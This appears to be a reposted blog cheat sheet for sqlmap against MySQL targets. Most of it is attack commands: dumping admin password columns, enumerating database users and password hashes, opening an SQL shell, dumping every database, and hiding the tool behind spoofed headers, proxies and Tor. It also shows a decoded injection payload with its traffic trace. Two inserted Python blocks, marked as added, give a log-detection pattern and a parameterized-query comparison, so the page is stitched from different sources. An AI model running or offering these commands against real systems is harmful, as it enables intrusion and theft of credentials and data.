sqlmap MySQL example: a simple sqlmap MySQL injection demo with screenshots

Published: 2024/10/14  Database  74  豆豆

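Installation tutorials are easy to find with a quick Baidu search.

First download the required files; on a Windows environment, go directly to

I watched an expert's video to learn from it and am attaching screenshots... consider this a repost... it is only meant for sharing.

Examples follow: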

sqlmap.py --update    update

-h help

sqlmap.py -u --dbms "Mysql" --current-user

/* Note: get the current user name

current user: 'root@localhost'

sqlmap.py -u --dbms "Mysql" --current-db

/* Current database

current database: 'wepost'

sqlmap.py -u --dbms "Mysql" --tables -D "wepost"

sqlmap.py -u --dbms "Mysql" --columns -T "admin" -D "wepost"

sqlmap.py -u --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns


A brief sqlmap guide

Update

svn checkout sqlmap-dev

sqlmap.py -u "" -v 1 --sql-shell // execute SQL statements

sqlmap.py -u "" -v 5 // more detailed output

load options from a configuration INI file

sqlmap -c sqlmap.conf

Submit using the POST method

sqlmap.py -u "" --method POST --data "id=1"

Submit via cookies; cookie values are separated by ;. TamperData can be used to capture the cookies

python sqlmap.py -u "" --cookie "id=1" -v 1

Spoof the Referer header

python sqlmap.py -u "" --referer "" -v 3

Use a custom User-Agent, or pick one at random from the bundled user-agents.txt

python sqlmap.py -u "" --user-agent "Mozilla/4.0 compatible; MSIE 7.0; Windows NT 5.1" -v 3

python sqlmap.py -u "" -v 1 -a "./txt/user-agents.txt"
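Because the User-Agent is chosen by the client, as the two commands above show, log-based detection should not rely on the tool's default `sqlmap/<version>` string alone. The following is an added example, not part of the original post: it assumes a combined-format access log, uses constructed sample lines built from the request trace shown on this page, and also inspects the URL-decoded query string.

```python
import re
from urllib.parse import urlsplit, unquote

# Default tool User-Agent, e.g. "sqlmap/0.7rc1" as in the trace on this page.
SQLMAP_UA = re.compile(r"^sqlmap/\S+", re.I)
# A quote, then AND/OR and an N=N comparison, e.g. 1' AND 7433=7433 ...
BOOLEAN_TEST = re.compile(r"'\)*\s+(?:AND|OR)\s+\(*\d+\s*=\s*\d+", re.I)
# Assumed layout: "METHOD target PROTO" status size "referer" "user-agent"
LINE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Constructed log lines (addresses are documentation ranges).
SAMPLE_LINES = [
    # Default User-Agent and the encoded payload from the page's trace.
    '192.0.2.10 - - [14/Oct/2024:10:00:00 +0000] "GET /sqlmap/mysql/get_str_brackets.php'
    '?id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test HTTP/1.1" '
    '200 512 "-" "sqlmap/0.7rc1"',
    # Same request with a browser-like User-Agent: only the payload gives it away.
    '192.0.2.10 - - [14/Oct/2024:10:00:05 +0000] "GET /sqlmap/mysql/get_str_brackets.php'
    '?id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test HTTP/1.1" '
    '200 512 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"',
    # Ordinary request.
    '198.51.100.7 - - [14/Oct/2024:10:01:00 +0000] "GET /sqlmap/mysql/get_str_brackets.php'
    '?id=1 HTTP/1.1" 200 498 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"',
]

def classify(line):
    """Return the set of findings for one access-log line."""
    m = LINE.search(line)
    if not m:
        return set()
    findings = set()
    if SQLMAP_UA.match(m.group("ua")):
        findings.add("sqlmap-user-agent")
    # Decode before matching: the payload arrives percent-encoded.
    query = unquote(urlsplit(m.group("target")).query)
    if BOOLEAN_TEST.search(query):
        findings.add("boolean-test-in-query")
    return findings

if __name__ == "__main__":
    for sample in SAMPLE_LINES:
        print(sorted(classify(sample)))
```
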

Use Basic authentication

python sqlmap.py -u "" --auth-type Basic --auth-cred "" -v 3

Use Digest authentication

python sqlmap.py -u "" --auth-type Digest --auth-cred "" -v 3

Use a proxy, together with Tor

python sqlmap.py -u "" --proxy ""

python sqlmap.py -u "" --proxy ""

Use multiple threads for guessing

python sqlmap.py -u "" -v 1 --current-user --threads 3

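Skip dynamic detection and specify the injectable parameter directly; multiple parameters can be separated with commas, and User-Agent injection can be specified

python sqlmap.py -u "" -v 1 -p "id"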

python sqlmap.py -u "" -v 1 -p "cat,id"

python sqlmap.py -u "" -v 1 -p "user-agent" --user-agent "sqlmap/0.7rc1 "

Specify the DBMS, bypassing sqlmap's automatic detection

python sqlmap.py -u "" -v 2 --dbms "PostgreSQL"

* MySQL

* Oracle

* PostgreSQL

* Microsoft SQL Server

Specify the operating system, bypassing sqlmap's automatic detection

python sqlmap.py -u "" -v 2 --os "Windows"

* Linux

* Windows

Custom payload

Options: --prefix and --postfix

In some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. These options also come in handy when the user already knows the query syntax and wants to detect and exploit the SQL injection by directly providing an injection payload prefix and/or postfix.

Example on a MySQL 5.0.67 target on a page where the SQL query is: $query = "SELECT * FROM users WHERE id='" . $_GET['id'] . "' LIMIT 0, 1";:

$ python sqlmap.py -u "" -v 3 -p "id" --prefix "'" --postfix "AND 'test'='test"

[...]

[] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis

[] [INFO] testing custom injection on GET parameter 'id'

[] [TRAFFIC OUT] HTTP request:

GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20

%28%27test%27=%27test HTTP/1.1

Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7

Host: 192.168.1.121:80

Accept-language: en-us,en;q=0.5

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,

image/png,*/*;q=0.5

User-agent: sqlmap/0.7rc1

Connection: close

[...]

[] [INFO] GET parameter 'id' is custom injectable

[...]

As you can see, the injection payload for testing for custom injection is:

id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

which URL decoded is:

id=1' AND 7433=7433 AND 'test'='test

and makes the query syntactically correct with respect to the page query:

SELECT * FROM users WHERE id='1' AND 7433=7433 AND 'test'='test' LIMIT 0, 1

In this simple example, sqlmap could detect the SQL injection and exploit it without a custom injection payload, but in real-world applications it is sometimes necessary to provide one.
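Why the quote-balancing payload works against the concatenated query, and why a bound parameter removes the problem, shown as an added example (not from the original page or the sqlmap project). It uses Python's sqlite3 in place of the page's PHP/MySQL, the table contents are constructed, and the false-condition payload is a constructed variant of the page's payload.

```python
import sqlite3

TRUE_PAYLOAD = "1' AND 7433=7433 AND 'test'='test"   # decoded payload from the page
FALSE_PAYLOAD = "1' AND 7433=7434 AND 'test'='test"  # constructed: same shape, false condition

def make_db():
    # Constructed sample data; the table name follows the page's query.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id TEXT, name TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("1", "luther"), ("2", "fluffy")])
    return db

def lookup_concat(db, user_id):
    # Same shape as the page's PHP: the value is pasted between the quotes,
    # so a quote inside user_id ends the literal and the rest is parsed as SQL.
    query = "SELECT * FROM users WHERE id='" + user_id + "' LIMIT 0, 1"
    return query, db.execute(query).fetchall()

def lookup_bound(db, user_id):
    # Placeholder: the driver passes user_id as data, never as SQL text.
    query = "SELECT * FROM users WHERE id=? LIMIT 0, 1"
    return query, db.execute(query, (user_id,)).fetchall()

def responses_differ(lookup):
    # If a true and a false condition give different results, the page
    # answers yes/no questions about the database for whoever asks.
    db = make_db()
    return lookup(db, TRUE_PAYLOAD)[1] != lookup(db, FALSE_PAYLOAD)[1]

if __name__ == "__main__":
    db = make_db()
    print(lookup_concat(db, TRUE_PAYLOAD)[0])
    print("concatenated query leaks a boolean:", responses_differ(lookup_concat))
    print("bound parameter leaks a boolean:   ", responses_differ(lookup_bound))
```

The concatenated version reproduces the exact statement shown above; the bound version compares `id` against the whole payload as one string and returns no row for either condition.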

Page comparison

python sqlmap.py -u "" --string "luther" -v 1

python sqlmap.py -u "" --regexp "lu[\w][\w]er" -v

Exclude parts of the page content

python sqlmap.py -u "" --excl-reg "Dynamic content: [\d]+"

Stacked-query test; PHP's built-in mysql_query function does not support multiple statements

python sqlmap.py -u "" --stacked-test -v 1

UNION injection test

python sqlmap.py -u "" --union-test -v 1

UNION injection combined with ORDER BY

python sqlmap.py -u "" --union-test --union-tech orderby -v 1

python sqlmap.py -u "" -v 1 --union-use --banner

python sqlmap.py -u "" -v 5 --union-use --current-user

python sqlmap.py -u "" -v 1 --union-use --dbs

fingerprint

python sqlmap.py -u "" -v 1 -f

python sqlmap.py -u "" -v 1 -f -b

Check whether the current user is a DBA

python sqlmap.py -u "" --is-dba -v 1

Enumerate database users

python sqlmap.py -u "" --users -v 0

Enumerate database user passwords

python sqlmap.py -u "" --passwords -v 0

python sqlmap.py -u "" --passwords -U sa -v 0

View user privileges

python sqlmap.py -u "" --privileges -v 0

python sqlmap.py -u "" --privileges -U postgres -v 0

List databases

python sqlmap.py -u "" --dbs -v 0

List the column names of a given table in a given database

python sqlmap.py -u "" --columns -T users -D test -v 1

Dump the contents of a given column of a given table in a given database

python sqlmap.py -u "" --dump -T users -D master -C surname -v 0

Specify the range to list, from 2 to 4

python sqlmap.py -u "" --dump -T users -D test --start 2 --stop 4 -v 0

Dump the contents of all tables in all databases

python sqlmap.py -u "" --dump-all -v 0

Dump only the contents of databases and tables created by users themselves

python sqlmap.py -u "" --dump-all --exclude-sysdbs -v 0

sql query

python sqlmap.py -u "" --sql-query "SELECT usename FROM pg_user" -v 0

python sqlmap.py -u "" --sql-query "SELECT host, password FROM mysql.user LIMIT 1, 3" -v 1

SELECT usename, passwd FROM pg_shadow ORDER BY usename

Save and resume a session

python sqlmap.py -u "" -b -v 1 -s "sqlmap.log"

Save options to an INI configuration file

python sqlmap.py -u "" -b -v 1 --save
